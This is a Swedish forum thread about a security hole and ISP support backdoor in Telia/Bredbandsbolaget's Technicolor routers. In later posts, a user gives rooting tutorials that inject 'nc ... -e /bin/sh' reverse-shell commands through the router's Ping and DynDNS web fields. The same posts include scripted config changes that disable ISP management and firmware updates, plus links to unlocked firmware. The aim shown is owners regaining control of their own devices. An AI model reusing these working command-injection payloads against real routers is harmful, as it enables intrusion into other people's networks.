Säkerhetshål i BBB Technicolor TG799vacXTREAM router, DnsMasq heap buffer overflow vulnerability, Severity:High

Permalänk
Inaktiv

@Paddanx: Har inte råd . Fast jag tycker routern är bra om man vet hur man ställer in den.

Har frågat telia vilka som har tillgång till ip-nummret som går vidare till dom, svaret var hela supporten. Ett par tusen personer + belgiska supporten hos technicolor - ofta dom har koll på alla dessa människor, finns säkert flertalet som infiltrerar ens nät.

@Zensig minst sagt Inte nog med det, opkg är installerat också och kollar man i /etc/opkg.conf så hämtas packages från: https://archive.openwrt.org/snapshots/trunk/brcm63xx/generic/... och man installerar dessa via 'opkg install url/to/ipk" . Kolla in verktygen på den listam, rätt mycket fina verktyg för att snoka på ens nätverk.

@Uzanar Precis, det stämmer det du skriver att det är till för support.

Permalänk
Medlem
Skrivet av anon277726:

@Paddanx: Har inte råd . Fast jag tycker routern är bra om man vet hur man ställer in den.

Fick köpa en beg Cisco Small Bussiness router för typ 1,5 år sedan samt 2 Zyxel APs... allt för 1000kr. De var ca 1 år gamla. Kunde inte låta bli, och de har varit bergstabila sedan installation och senaste uppdatering (för ca 3 mån sedan i Wifin).

Även vettiga ASUS routrar kan du om du vet hur, ställa in vettigt, med bra firmware (utom kanske Wifi).

För mig är det en fråga om... varför ens ta en risk att ha detta hål, support eller inte. Jag kan konfigurera min sida av nätverket. Jag behöver inte att de ska in och pilla med min utrustning, på min sida. Så det skulle aldrig i min vildaste fantasi falla mig in att ens använda dessa routrar, då man inte vet vad som sker. Men jag ska behöva gå in och pilla med superusers för att "stänga det"?

Är lite som att byta lås på dörren hemma. Varför skulle man inte byta det till ett man vet ingen annan har?
Har förra ägarna det? Har bostadsrättsföreningen den? Har rörläggaren som skulle fixa toaletten den? Elektrikern du anlitar då och då har väl en? Vem tänker så?

Hade man haft ett hårdvaruskydd. Tex en nyckel eller något som var tvunget att fysiskt "sättas in" i routern för att någon skulle kunna komma åt den supportmässigt, hade det varit bättre design. Du kan sätta nyckeln så den har en hållare i routern, men den måste vridas för att BBB/Telia mfl ska kunna logga in. Då vet du att du ger dem access. Och du kan då designa den så att när nyckeln inte är i, kan ingen komma åt den. (Eller ja... ingen planerad iaf, 100% säker kan man inte vara)

Permalänk
Medlem

Farsan har denna router (bredbandet och routern ingår i hyran).

Kan jag köpa en säkrare router och bara byta? eller är bredbandet låst till denna osäkra dynga?

Om det går att byta, vad ska man köpa? (en router som inte har detta säkerhetsproblem).

Visa signatur

XripperX

Permalänk
Inaktiv
Skrivet av XripperX:

Farsan har denna router (bredbandet och routern ingår i hyran).

Kan jag köpa en säkrare router och bara byta? eller är bredbandet låst till denna osäkra dynga?

Om det går att byta, vad ska man köpa? (en router som inte har detta säkerhetsproblem).

Du kan köpa en ny router till farsan den är inte låst till operatören, har han TV via internet så får du brygga routern annars är det bara att byta.

Mvh

Skickades från m.sweclockers.com

Permalänk
Avstängd

Jo nu kanske det är trevligt att ha en router som platsar i uptime-tråden

Allvarligt, har ingen pratat IRL med BBB och krävt ett djupare svar? (mer än 1:a linjen)

Visa signatur

ASUS K56CB i7, W10 > Asus VivoBook S15 S530UN
HTC 10
ASUS Transformer Prime 32GB, Nougat :)
Ubiquiti Edge Lite, UniFi AP-AC-Lite (AP) samt ASUS AC68U och N66U (AP), fiber 500/100Mbit/s.
Mitt nätverk: https://imgur.com/aco9XQz Bild https://imgur.com/oQ2WG9Y

Permalänk
Medlem

Jag får detta fel på farsans BBB router och på min D-link 860L. "DnsMasq heap buffer overflow vulnerability"

Är detta WPA2crack relaterat eller någon annan "säkerhetsrisk"?

Det börjar bli mycket elände nu meltdown , Spectre WPA2crack osv....

Visa signatur

XripperX

Permalänk
Avstängd

Kan du beskriva det bättre hur du ser detta fel?

Senaste firmware?

Visa signatur

ASUS K56CB i7, W10 > Asus VivoBook S15 S530UN
HTC 10
ASUS Transformer Prime 32GB, Nougat :)
Ubiquiti Edge Lite, UniFi AP-AC-Lite (AP) samt ASUS AC68U och N66U (AP), fiber 500/100Mbit/s.
Mitt nätverk: https://imgur.com/aco9XQz Bild https://imgur.com/oQ2WG9Y

Permalänk
Medlem

@plunn:

Avast wifi test, har senaste firmware på d-link och farsan bbb router är låst.

Visa signatur

XripperX

Permalänk
Avstängd

@XripperX: Jo då får du väl plåga BBB och slå dig igenom 1:a linjens mediokra support.

Sen efter Telenors övertagande så kanske det inte är möjligt? Surfa EU-Thailand is the mission

Visa signatur

ASUS K56CB i7, W10 > Asus VivoBook S15 S530UN
HTC 10
ASUS Transformer Prime 32GB, Nougat :)
Ubiquiti Edge Lite, UniFi AP-AC-Lite (AP) samt ASUS AC68U och N66U (AP), fiber 500/100Mbit/s.
Mitt nätverk: https://imgur.com/aco9XQz Bild https://imgur.com/oQ2WG9Y

Permalänk
Medlem

Svar från PTS

Fick följande 2 svar från PTS. Första (längst ner) tolka jag som att de inte direkt brydde sig om kundfrågor. Andra mailsvaret verkar iaf lite mer lovande. Vi får se.

"VB: Sårbarhet i BBB/Telias kundroutrar som inte åtgärdas! - Löpnummer K18-16604
Konsument <konsument@pts.se>
Yesterday, 7:54 AM
Hej,
Nätsäkerhetsavdelningen på PTS tackar för informationen och undersöker de rapporterade sårbarheterna vidare.

Hör gärna av dig igen om du har fler frågor!
Med vänlig hälsning
Nomie på PTS tipsfunktion
_________________________________
Post- och telestyrelsen (PTS)
Avdelningen för Samhällsfrågor
Enheten för konsumenträttigheter
www.pts.se

Vad gör PTS?
PTS är den myndighet som har ansvar för området elektronisk kommunikation. Vi har regeringens uppdrag att följa utvecklingen på bland annat Internet- och teleområdena. Myndigheten sammanställer statistik över konsumenternas problem på dessa områden. Statistiken ger oss värdefull information om hur marknaden fungerar, och redovisas årligen. PTS kan i vissa fall ingripa om ett företag bryter mot bestämmelserna i lagen om elektronisk kommunikation. PTS kan dock inte ingripa i tvister mellan enskilda och företag.
Konsument <konsument@pts.se>

Wed 21/03, 7:36 AM
Hej,

Tack för din fråga. Vi på PTS har stor nytta av frågor och synpunkter från allmänheten eftersom de hjälper oss att följa utvecklingen på marknaden för elektronisk kommunikation. PTS är en central förvaltningsmyndighet som har ett samlat ansvar, sektorsansvar, inom området för elektronisk kommunikation. Inom ramen för detta ansvar ska PTS bl.a. utöva tillsyn enligt lagen (2003:389) om elektronisk kommunikation (LEK).

PTS behandlar inte enskilda abonnenters klagomål. I de fall klagomål från ett flertal abonnenter ger PTS anledning att förmoda att generella problem föreligger på marknaden, eller att ett företag bryter mot bestämmelserna i lagen kan klagomålen leda till tillsynsåtgärder från PTS sida.

I lagen finns krav på att operatörerna ska vidta tekniska och
organisatoriska åtgärder för att skydda de uppgifter de behandlar. Hur hög
skyddsnivå de ska uppnå beror på risken för integritetsincidenter, vilken
teknik som finns tillgänglig och vad det kostar att genomföra åtgärderna. PTS
har utfärdat föreskrifter som innehåller mer detaljerade krav på
säkerhetsåtgärder. PTSFS 2014:1 gäller för
alla elektroniska kommunikationstjänster.

Konsumentinformation
om internetsäkerhetsfrågor, liksom frågor om IT-säkerhet i hemmet, hanteras
inte av PTS utan av MSB (Myndigheten för samhällsskydd och beredskap).

Telefonväxel:
0771-240 240.

Om man är missnöjd med en operatör ska man i första hand kontakta operatören. Om detta inte hjälper kan man vända sig till Telekområdgivarna, www.telekomradgivarna.se, tel. 08-522 767 00, vardagar kl. 9-12, eller till Konsumentvägledningen i kommunen om det finns en sådan där man bor, http://www.hallakonsument.se/sok-din-kommuns-konsumentverksam.... Om det inte finns en konsumentvägledare i din kommun så kan du kontakta Hallå konsument som är Konsumentverkets konsumentrådgivning, du kan besöka deras webbplats där det även finns en chattfunktion eller ange ditt telefonnummer för att bli uppringd, http://www.hallakonsument.se/ eller ringa dem på telefonnummer 0771-525 525 vardagar mellan 9-17. Kan tvisten ändå inte lösas kan man vända sig till Allmänna reklamationsnämnden, ARN, www.arn.se för att få tvisten löst.

Om du har ingått ett avtal i egenskap av företagare gäller inte konsumenträttslig lagstiftning. Frågor om företagsabonnemang faller utanför Telekområdgivarnas uppdrag. Undantaget är klagomål som rör Telekområdgivarnas uppföranderegler för enskilda firmor.

Hör gärna av dig igen om du har fler frågor!
Med vänlig hälsning
Nomie på PTS tipsfunktion
_________________________________
Post- och telestyrelsen (PTS)
Avdelningen för Samhällsfrågor
Enheten för konsumenträttigheter
www.pts.se

Vad gör PTS?
PTS är den myndighet som har ansvar för området elektronisk kommunikation. Vi har regeringens uppdrag att följa utvecklingen på bland annat Internet- och teleområdena. Myndigheten sammanställer statistik över konsumenternas problem på dessa områden. Statistiken ger oss värdefull information om hur marknaden fungerar, och redovisas årligen. PTS kan i vissa fall ingripa om ett företag bryter mot bestämmelserna i lagen om elektronisk kommunikation. PTS kan dock inte ingripa i tvister mellan enskilda och företag."

Permalänk
Medlem

Har en Technicolor från Telia. Fortfarande v 2.75 trots att sårbarheten varit känd över en månad, och trots att v 2.78 släpptes redan i oktober 2017.

En riktig skräprouter som ofta tappar eller får fel på wifi och måste startas om för att fungera. Ska bli så skönt att få fiber indragen om några veckor.

Permalänk
Medlem

Rolig tråd att läsa . Men först kanske man skall klargöra två saker:

1. Det som står i villkoren är det som gäller. Tro och tycke finns inte där, i alla fall inte till konsumentens fördel. Man läser väl villkoren innan man ingår ett avtal?

2. Eventuella brottsliga handlingar ansvarar brottslingen för, inte någon annan. I Sverige är man inte ansvarig för någon annans handlingar än sina egna förutom som målsman för minderåriga. Om någon postar en bomb till dig eller vitt pulver så är väl inte t.ex. PostNord ansvariga för det när bostaden sprängs i luften tillsammans med spädbarnet, kärringen samt hunden?

Visa signatur

Grundregel för felsökning: Bryt och begränsa.

Permalänk
Medlem

Men om någon "fildelar" på ens lina via detta "säkerhetshål", och man på sådant sätt får "hotbrev" från trolladvokater.

Vem är ansvarig?, och hur bevisar man att detta är BBB fel (tar inte sitt säkerhetsansvar).

Visa signatur

XripperX

Permalänk
Medlem

Majoriteten människor är lekmän på området. Dom behöver inte bevisa något, bevisbördan ligger hos den som anklagar. Har Du inte fildelat så säger Du detta vid förhöret.

Visa signatur

Grundregel för felsökning: Bryt och begränsa.

Permalänk
Medlem
Skrivet av Caernoga:

Har en Technicolor från Telia. Fortfarande v 2.75 trots att sårbarheten varit känd över en månad, och trots att v 2.78 släpptes redan i oktober 2017.

En riktig skräprouter som ofta tappar eller får fel på wifi och måste startas om för att fungera. Ska bli så skönt att få fiber indragen om några veckor.

Slå av wifin skaffa en riktig ap. Inga problem med den routern annars, den routar trafiken precis som den skall!

Permalänk
Medlem

@Gaist: Fast som konsument ska man kunna kräva att utrustningen man köper faktiskt fungerar som utlovat, och inte behöva köpa extragrejor och konfigurera en massa. Betänk tex Agda, 72, som bara vill kunna se på tv och facetima med barnbarnen. Kunskapsnivån på Sweclockers ligger skyhögt över gemene mans.

Permalänk

@anon277726 - Jag skulle väldigt gärna ta del av hur du hackat routern? Driver mig t vansinne att inte kunna ändra dns i eländet när man köpt smart dns proxy o allt..? Vissa saker funkar ju utan att ändra i routern men ex chromecast är inte lätt att ändra dns på…

Skrivet av anon277726:

Du kan köpa en ny router till farsan den är inte låst till operatören, har han TV via internet så får du brygga routern annars är det bara att byta.

Mvh

Skickades från m.sweclockers.com

Glömde lite detaljer
Permalänk
Inaktiv

Sorry, inte varit inloggad på ett tag och fått lite meddelanden av några som vill ta sig in i sin router så jag försöker sätta ihop en enkel tutorial här. Brukar inte skriva tutorials direkt så det blir som det blir, lets go!

Detta fungerar till v16.2 Jade, telias nuvarande version. Har du 17.x och vill nedgradera dig igen så pma så skickar jag ett tool för att nedgradera din firmware.

Client side:
1. Dra hem en valfri linux dist och installera netcat om det inte finns förinstallerat.
- Finns säkert till powershell också skulle jag tro om man kör Windows.
2. Kör igång en netcat listener på följande vis
root@sweclockers $ nc -lvvp 1337
listening on [any] 1337 ...

-
3. Logga in på http://192.168.1.1 eller http://dlsdevice.lan
2. Klicka på advanced setup
3. Klicka på inställningar för: Diagnostics Ping&Trace
4. I ping rutan skriv:
:::::::;nc 192.168.1.x 1337 -e /bin/sh (naturligtvis ip-nummret till din maskin som har netcat igång på port 1337)

The magic is now done, you're in!

sh-4.4# nc -lvvp 1337
listening on [any] 1337 ...
connect to [192.168.1.104] from router [192.168.1.1] 35835

- Nu börjar det roliga.

Går igenom det viktigaste annars får jag sitta hela natten då det finns otroligt mycket att ställa in och leka med.

Byt root password:
skriv 'passwd' när du ser att du är ansluten.

Spana in operatörens setup för att bevittna deras backdoor med egna ögon:
cat /etc/config/dropbear

Denna config vill vi editera, hanterar du vi/vim så är de bara att editera 'vim /etc/config/dropbear'
Är du inte van med vim så använd sed bara för att editera configen:

Ändra operatörens settings till off och 0 eller kommenetera ut deras settings bara genom att skriv:
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear; sed -i '21s/off/on/' /etc/config/dropbear; sed -i '24s/0/1/' /etc/config/dropbear

Bör se ut något såhär:

Reboota inte ännu
Starta om dropbear genom att skriva
/etc/init.d/dropbear restart

ssh:a in till routern så är du inne och ser deras welcome message:

-

Härifrån kan du ändra precis ALLT, bridge mode, dns modes, serie nummer, yeah you name it! Men det tar vi en annan gång, för att installera paket använd opkg. /bin/opkg

/bin/opkg list-installed # för att lista telias & technicolors förinstallerade skit
/bin/opkg update # för att hämta en uppdaterad package list
/bin/opkg install package # för att installera paket
/bin/opkg search package # för att söka efter paket.

http://pkg.entware.net/binaries/armv5/ är vad som är inställt från fabrik, vill du lägga till fler källor så är det i /etc/opkg.conf det skall läggas till.

root@OpenWrt:~# cat /etc/opkg.conf .
src/gz packages http://pkg.entware.net/binaries/armv5
dest root /
dest ram /opt/tmp
lists_dir ext /opt/var/opkg-lists
option tmp_dir /opt/tmp

- Ni kan även lägga till massa funktioner som openvpn, ändra sync tider, fixa usb sharing som har varit blockerat tidigare. Ja precis allt som man skall kunna göra helt enkelt.

Lycka till!

Edit: Ja just, vill du inte ha password auth tillåten så är det dropbear som gäller, bara installera dropbear på valfri dist:

Generera din nyckel genom att skriva:
dropbearkey -t rsa -f /etc/dropbear/authorized_keys -s 4096

Följt av:
ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub

Du kan nu reboota routern genom att skriva 'reboot' när du ställt in allt.

Dropbear kommer vara igång från boot om du ställt in dropbear rätt.

Nu är det bara att ansluta utan password i framtiden från din maskin.

// wuseman

Permalänk
Inaktiv
Skrivet av fireplayer:

@wuseman - Jag skulle väldigt gärna ta del av hur du hackat routern? Driver mig t vansinne att inte kunna ändra dns i eländet när man köpt smart dns proxy o allt..? Vissa saker funkar ju utan att ändra i routern men ex chromecast är inte lätt att ändra dns på…

Denna länken kan komma till stor hjälp om du kommer in i routern:

https://support.unlocator.com/customer/portal/articles/128481...

Permalänk
Medlem

@anon277726: Tack så mycket! Tragiskt att man skall behöva hacka sin router för att leverantören som låst den inte tar sitt ansvar!

Permalänk
Medlem

Det här är fan en skandal, varför tar inte BBB sitt djävla ansvar?

Vad innebär detta "fel"? DnsMasq heap buffer overflow vulnerability. (har detta med WPA2 CRACK i oktober 2017 att göra?)

Visa signatur

XripperX

Permalänk
Medlem

Jag körde ett nytt test på farsans router och nu får jag inga "varningar" alls, kan det vara så att BBB har fixat problemet ?

Visa signatur

XripperX

Permalänk
Medlem

@XripperX: Jag har varit bortrest och stängde av routern när jag var borta just så att den inte skulle hackas under tiden. Har haft igång den några timmar nu och såg ditt inlägg. Försökte logga in på admin gränssnittet på routern med lösenordet jag satt (inte BBB default) och får fel lösenord meddelande. Prova då med BBB default lösen och då kommer jag in. Routern kör nu "Version Gold (17.1)" (innan var det 15.4) och Avast varnar inte längre för osäker router iom att firmware på routern uppdaterats till en nyare version utan säkerhetshålet.

Jag tror att det var mailet jag skicka till Post & Telestyrelsen som gav effekt. Fick först ett mail från dem om att de inte lägger sig i slutkundsproblem. Dagen efter kom det dock ett nytt mail med ett ärendenr. Sen har jag inte hört något men misstänker att PTS kontakta BBB och då vart det lite fart på folket där

Nåväl routern iaf uppdaterad så den borde vara någorlunda säker tills de hittar något nytt säkerhetshål...

Permalänk
Inaktiv

@Zensig: Snyggt, ja jag skulle tro att det gav effekt då det kom ut en uppgradering såpass fort..

Nåja, för att hacka Firmware 17.1 så gör följande:

nc -lvvp 1337

I dyndns inställningarna så aktivera dynds, ställ in service name dyn.com och aktivera även https och fyll i: 'test.com;nc ip 13'

Ha netcat igång på port 1337, sedan kan ni göra som på tidigare router för att installera packages med opkg osv.

17.1 ^

17.2 Har släppts, för att undvika att bli utelåst på routern om man vill ha kvar tillgång till routern så ändra:
option upgradefw '1' till option upgradefw '0' i /etc/config/web och ni kan även stänga av cwmpd då såvitt jag vet inte någon som hittat en exploit i 17.2 ännu så trist om man blir utkastad:

/etc/init.d/nginx restart;
/etc/init.d/cwmpd disable;
/etc/init.d/cwmpdboot disable;
killall -9 cwmpd cwmpdboot

Laddade upp firmware 17.2.0188 om någon skulle vara intresserad ändå av den:
http://www.filedropper.com/vant-ycrf691-1720188-820-ra_1

Permalänk
Medlem

@anon277726: Tackar igen! Dock är jag för lat för att hacka routern om jag inte absolut måste. Kanske i framtiden!

Permalänk
Medlem

Tack för det. Det blir ju inte bättre av att man hittar WiFi-passkeys i klartext i /root/parameter_conversion.log direkt. Ok nevermind, de står i klartext i /etc/config/wireless alltihop.

Finns lite "sköna" intercept-detaljer konfigurerat också...

Visa signatur

Citera mig för svar.
Arch Linux

Permalänk
Inaktiv

Japp, de finns mycket värre saker än det . Skriv "uci show" så har du i princip alla inställningar där, även passwords/hashes/rules m.m.

web.usr_Administrator=user
web.usr_Administrator.name='Administrator'
web.usr_Administrator.role='admin'
web.usr_Administrator.srp_salt='CF52EXX'
web.usr_Administrator.srp_verifier='435C1238C1C699E7E15B002135524A6522CAF44680EDA9988F57360A3E7527C905817E4A237AEE1E057531D2AE12AB3F7BA2C88632200532FF0385CDF077F442A777E6904D3C47E879551395C0FF7B74067CA57DAFAF4D4F836F82AAC472EAFDD905A08F519DF006156C9D91C7CE52BDDDD7A1ED45570444F4D1CDB531FDC29D7B1626DD3DD77BDE4BB9322096C3ED5EE2332C216F2955AE4C05'
web.usr_assist=user
web.usr_assist.name='assist'
web.usr_assist.role='telia'
web.ruleset_main=ruleset
web.ruleset_main.rules='gateway' 'login' 'password' 'homepage' 'gatewaymodal' 'broadbandmodal' 'internetmodal' 'wirelessmodal' 'wirelessqrcodemodal' 'ethernetmodal' 'devicemodal' 'wanservices' 'firewallmodal' 'diagnosticsconnectionmodal' 'diagnosticsnetworkmodal' 'diagnosticspingmodal' 'diagnosticsxdslmodal' 'diagnosticsigmpproxymodal' 'assistancemodal' 'usermgrmodal' 'syslogmodal' 'dmzmodal' 'todmodal' 'iproutesmodal' 'cwmpconf' 'relaysetupmodal' 'xdsllowmodal' 'natalghelper' 'wirelessclientmodal' 'contentsharing' 'ltemodal' 'ltedoctormodal' 'ltesms' 'lteprofiles' 'lteradioparameters' 'lteajaxsms' 'lteajaxmobiletab' 'ltenetworkscan' 'lteajaxsim' 'ltesim' 'ltedoctorajax' 'ltedoctor' 'parentalmodal' 'iptv' 'home' 'accesscode' 'wifissid' 'wifipsk' 'wifiguest' 'wifissid5GHz' 'wifipsk5GHz' 'wifiguest5GHz' 'mmpbxglobalmodal' 'mmpbxprofilemodal' 'mmpbxinoutgoingmodal' 'mmpbxservicemodal' 'mmpbxlogmodal' 'mmpbxdectmodal' 'mmpbxcontactsmodal' 'applicationsmodal' 'ajaxgatewaytab' 'ajaxinternet' 'mmpbxinoutgoingmapmodal' 'mmpbxstatisticsmodal' 'cwmpconfmodal' 'iproutesmodal' 'systemmodal' 'relaymodal' 'natalghelpermodal' 'diagnosticstcpdumpmodal' 'xdsllowmodal' 'mmpbxinoutgoingmapmodal' 'mmpbxstatisticsmodal' 'cwmpconfmodal' 'iproutesmodal' 'systemmodal' 'relaymodal' 'natalghelpermodal' 'diagnosticstcpdumpmodal' 'mmpbxinoutgoingmapmodal' 'mmpbxstatisticsmodal' 'cwmpconfmodal' 'iproutesmodal' 'systemmodal' 'relaymodal' 'natalghelpermodal' 'diagnosticstcpdumpmodal' 'xdsllowmodal'
web.gateway=rule

Alla rules te.x för webben som routern är utrustad med egentligen, du kan ställa in så du får tillgång till alla dessa inställningar naturligtvis om du lägger ner lite tid så blir routern riktigt bra sedan faktiskt.

Permalänk
Inaktiv

Lyckats få tillgång till telias assistans på routern som har en logviewer och lite annat kul som inte finns med som default för oss användare.

Lust att få tillgång till eran egen assistance och byta ut telia mot assist så kan ni kopiera och klistra in i terminalen om ni vill ta ta bort telia och ta över alltihop, nyttja telias key från .ssh/authorized_keys för att ansluta sedan via ssh alt web

sed -i s/xx.xx.xx.xx/xx.xx.xx.xx/g /etc/config/dropbear
sed -i s/xx.xx.xx.xx/xx.xx.xx.xx/g /etc/config/dropbear
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear
sed -i '21s/off/on/' /etc/config/dropbear
sed -i '24s/0/1/' /etc/config/dropbear
sed -i '25s/0/1/' /etc/config/dropbear
/etc/init.d/nginx restart
/etc/init.d/dropbear restart

uci set dropbear.lan.enable='1'
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci add_list web.tvoicesipconfig.roles=admin
uci add_list web.tvoicecontacts.roles=admin
uci add_list web.tvoicecalllog.roles=admin
uci add_list web.tvoicecapability.roles=admin
uci add_list web.parentalblock.roles=admin
uci add_list web.ruleset_main.rules=mmpbxinoutgoingmapmodal
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci add_list web.mmpbxinoutgoingmapmodal.roles=admin
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci set web.mmpbxstatisticsmodal=rule
uci set web.mmpbxstatisticsmodal.target='/modals/mmpbx-statistics-modal.lp'
uci add_list web.mmpbxstatisticsmodal.roles=admin
uci set cwmpd.cwmpd_config.state=0
uci set cwmpd.cwmpd_config.upgradesmanaged=0
uci set cwmpd.cwmpd_config.periodicinform_enable=0
uci set cwmpd.cwmpd_config.acs_pass='0'
uci set cwmpd.cwmpd_config.acs_user='0'
uci set cwmpd.cwmpd_config.acs_url='invalid'
uci set wifi_doctor_agent.config.enabled=0
uci add_list web.ruleset_main.rules=cwmpconfmodal
uci set web.cwmpconfmodal=rule
uci set web.cwmpconfmodal.target='/modals/cwmpconf-modal.lp'
uci add_list web.cwmpconfmodal.roles=admin
uci set hotspotd.main.ipv4=0
uci set hotspotd.main.enable=false
uci set hotspotd.main.deploy=false
uci set hotspotd.TLS2G.enable=0
uci set hotspotd.FON2G.enable=0
uci add_list web.ruleset_main.rules=iproutesmodal
uci set web.iproutesmodal=rule
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci add_list web.iproutesmodal.roles=admin
uci add_list web.ruleset_main.rules=systemmodal
uci set web.systemmodal=rule
uci set web.systemmodal.target='/modals/system-modal.lp'
uci add_list web.systemmodal.roles=admin
uci add_list web.ruleset_main.rules=relaymodal
uci set web.relaymodal=rule
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci add_list web.relaymodal.roles=admin
uci add_list web.ruleset_main.rules=natalghelpermodal
uci set web.natalghelpermodal=rule
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci add_list web.natalghelpermodal.roles=admin
uci set tls-vsparc.Config.Enabled='0'
uci set tls-vsparc.Passive.PassiveEnabled='0'
uci add_list web.ruleset_main.rules=diagnosticstcpdumpmodal
uci set web.diagnosticstcpdumpmodal=rule
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci add_list web.diagnosticstcpdumpmodal.roles=admin
uci set system.config.export_plaintext='1'
uci set system.config.export_unsigned='1'
uci set system.config.import_plaintext='1'
uci set system.config.import_unsigned='1'
uci commit
sed -e 's/session:hasAccess("\/modals\/diagnostics-network-modal.lp")/session:hasAccess("\/modals\/diagnostics-network-modal.lp") and \n session:hasAccess("\/modals\/diagnostics-tcpdump-modal.lp")/' -i /www/cards/009_diagnostics.lp
sed -e 's^alt="network"></div></td></tr>\\^alt="network"></div></td>\\\n <td><div data-toggle="modal" data-remote="modals/diagnostics-tcpdump-modal.lp" data-id="diagnostics-tcpdump-modal"><img href="#" rel="tooltip" data-original-title="TCPDUMP" src="/img/network_sans-32.png" alt="network"></div></td></tr>\\^' -i /www/cards/009_diagnostics.lp
sed -e 's/{"logviewer-modal.lp", T"Log viewer"},/{"logviewer-modal.lp", T"Log viewer"},\n {"diagnostics-tcpdump-modal.lp", T"tcpdump"},\n/' -i /www/snippets/tabs-diagnostics.lp
sed -e 's/getrole()=="guest"/getrole()=="admin"/' -i /www/snippets/tabs-voice.lp
sed -e 's/{"mmpbx-sipdevice-modal.lp", T"Sip Device"},/{"mmpbx-sipdevice-modal.lp", T"Sip Device"},\n{"mmpbx-inoutgoingmap-modal.lp", T"In-Out Mapping"},\n{"mmpbx-statistics-modal.lp", T"Statistics"},/' -i /www/snippets/tabs-voice.lp
sed -e 's/if currentuserrole == "guest" /if currentuserrole == "admin" /' -i /www/docroot/modals/gateway-modal.lp
echo > /etc/rc.local
/etc/init.d/nginx restart;
/etc/init.d/cwmpd disable;
/etc/init.d/cwmpdboot disable;
/etc/init.d/wifi-doctor-agent disable;
/etc/init.d/hotspotd disable;
/etc/init.d/tls-vsparc disable;
killall -9 hotspotd cwmpd cwmpdboot watchdog-tch wifi-doctor-agent tls-vsparc;
/etc/init.d/dropbear start
echo > /etc/dropbear/authorized_keys

Reboota nu routern och wips du har massvis med roliga nya settings att ställa in.

Permalänk

@anon277726: du har pm...igen.

nc lyssnar men får inte connection på routern. - den säger att ip adressen är felaktig. + har felaktiga tags

Permalänk
Inaktiv
Skrivet av fireplayer:

@wuseman: du har pm...igen.

nc lyssnar men får inte connection på routern. - den säger att ip adressen är felaktig. + har felaktiga tags

Metod: 1 - Den enkla metoden:
För att komma åt ssh med en firmware på 17.2> så gör följande:

Sätt igång netcat som tidigare versioner på din PC:

  • nc -lvvp 1337

Från web interfacet http://dlsdevice eller http://192.168.1.1 på routern gör du följande:

  • Service name skriver du: 'dyn.com'

  • Sätt https(funkar inte detta prova utan) som ON/ENABLED

  • I fältet domain sker kommunikationen med routern genom att skriva: 'test.com;nc lanip 1337 -e /bin/sh'

Du bör nu vara ansluten via ssh till routern.

Funkar det inte att komma åt routern via ovanstående så får vi göra det den lite mer avancerade vägen.

Metod: 2 - Den avancerade metoden:
Upplåst Firmware 1.0.1 kan hämtas: här
Upplåst Firmware 1.0.3 kan hämtas: här
Firmware 16.2 och 17.2 kan hämtas: här
Autoflashgui för windows kan hämtas: här
Patch till autoflashgui kan hämtas: här

Detta är vad som krävs:

  • Ladda ner autoflashGUI för att uppgradera eller nedgradera din firmware, detta verktyg används även för att roota enheten (PÅ EGET ANSVAR!!)

  • Windows användare kan hämta hem den senaste versionen av autoflashgui på länken ovan, packa upp autoflashgui.7z och starta programmet genom att klicka på autoflashgui.exe.

  • Linux användare behöver ha virtualenv och pip installerat, gör så här för att komma igång:

  • Med autoflashgui, flasha firmwaren 1.0.3, använd aktuell firmware och fyll i resten enligt bilden:

I exemplet ovan kommer firmware 1.0.3 flashas och starta om modemet, roota den inaktiva bank folder i /opt där firmware 1.1.0 finns(länkarna finns ovanför), starta om igen fast denna gång med firmware 1.0.1 som nu skall vara installerat.

3) du skall nu kunna ansluta till din router med exempelvis putty(windows) och skicka över .rbi filen till din router, om du är en pro användare av openwrt firmwares så kan du gå direkt till /etc/config mappen och konfiguera din router. Om inte så måste du låsa upp GUI för att konfigurera din router via web interfacet.

4) Använd scp eller winscp för att föra över .rbi filen till /tmp på routern eller ett usb som du kan nyttja för att få över filen, gör följande när du fått över filen:

  • tar -zxvf /tmp/dga4132_unlocked.tar.gz -C /

  • /etc/init.d/rootdevice force

  • /etc/init.d/rootdevice force

Efter du skrivit följande så vänta bara då routern startas om i detta nu, innehållet i Bank_1 kommer att bli kopierat till Bank_2 eller tvärtom(förinställda overlays) i /opt..Ifall om något krashar ordentligt så är det alltid bra att använda Bank_1 som akttiv eftersom att de tillåter dig att flasha modemet med TFTP .
Ser du några error meddelande så ignorera dessa bara då det inte är något viktigt, du får dessa fel meddelanden för att du inte fått WAN ip-adressen från din operatör konfigurerad ännu och det gillar dom inte.

När routern har startat om så skall du nu kunna konfigurera din rootade router med upplåst firmware.

Är man nybörjare på Linux bör man inte gå allt för djupt med att leka med att hacka sin firmware, de kan bricka enheten dvs den blir totalt obrukbar om man inte vet vad man gör och någonting går fel, i de flesta fall räcker det att reseta routern för att få den återställd men inte är man helt skyddad ändå.

Tar inget som helst ansvar ifall om någon råkar bricka sin enhet, allt sker på eget ansvar..

MVH wuseman